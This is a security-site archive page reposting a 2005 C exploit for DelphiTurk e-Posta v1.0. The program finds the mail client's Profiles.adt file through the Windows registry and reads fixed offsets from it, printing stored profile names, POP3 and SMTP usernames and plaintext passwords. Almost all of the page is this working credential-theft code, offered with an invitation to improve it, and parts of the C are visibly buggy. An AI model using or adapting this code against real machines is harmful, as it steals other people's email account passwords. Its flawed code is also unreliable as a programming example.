首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DelphiTurk e-Posta v1.0 Local Exploit
来源:www.netmagister.com 作者:Kozan 发布时间:2005-02-20  

DelphiTurk e-Posta v1.0 Local Exploit

DelphiTurk e-Posta v1.0 Local Exploit by Kozan

Application: DelphiTurk e-Posta v1.0
Procuder: Delphiturk.com
Vulnerable Description: DelphiTurk e-Posta v1.0 discloses
passwords to local users.

Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

char *bilgi_oku(int adres,int uzunluk)
{

if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{

lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);

if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
RegCloseKey(hKey);
printf("An error occured!");
return 0;
}

RegCloseKey(hKey);

}else{
printf("An error occured!\n");
exit(1);
}

strcat(prgfiles,"\\Delphi Turk\\Delphi T黵k e-Posta
1.0\\Settings\\Profiles.adt");

int i;
FILE *fp;
char ch[100];
if((fp=fopen(prgfiles,"rb")) == NULL)
{
return "false";
}
fseek(fp,adres,0);
for(i=0;i<uzunluk;i++)
ch=getc(fp);
ch=NULL;
fclose(fp);
return ch;
}

int main()
{

printf("\r\n\r\nDelphiTurk e-Posta v1.0 Local Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com \r\n\r\n");
printf("This example exploit only shows the first record.\r\n");
printf("You may improve it freely...\r\n\r\n");
printf("ProfileName : %s\n",bilgi_oku(3609,25));
printf("Profile UserName : %s\n",bilgi_oku(3634,50));
printf("Profile MailAddress : %s\n",bilgi_oku(3684,40));
printf("Pop3 Mail Server : %s\n",bilgi_oku(3724,52));
printf("Pop3 UserName : %s\n",bilgi_oku(3776,50));
printf("Pop3 Password : %s\n",bilgi_oku(3826,50));
printf("Smtp Mail Server : %s\n",bilgi_oku(3976,52));
printf("Smtp UserName : %s\n",bilgi_oku(3928,50));
printf("Smtp Password : %s\n",bilgi_oku(3978,46));

return 0;

}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·3com 3CDaemon FTP Unauthorized
·DelphiTurk CodeBank 3.1 Local
·Medal of Honor Spearhead Dedic
·Thomson TCW690 POST Password V
·Typespeed Proof of Concept Loc
·Cfengine RSA Authentication Re
·Arkeia 5.3.x Type 77 Request R
·Nullsoft SHOUTcast v1.9.4 remo
·Arkeia 5.3.x Type 77 Request R
·Arkeia Backup Client Remote Ac
·Arkeia 5.3.x Type 77 Request R
·SHOUTcast DNAS/Linux v1.9.4 fo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved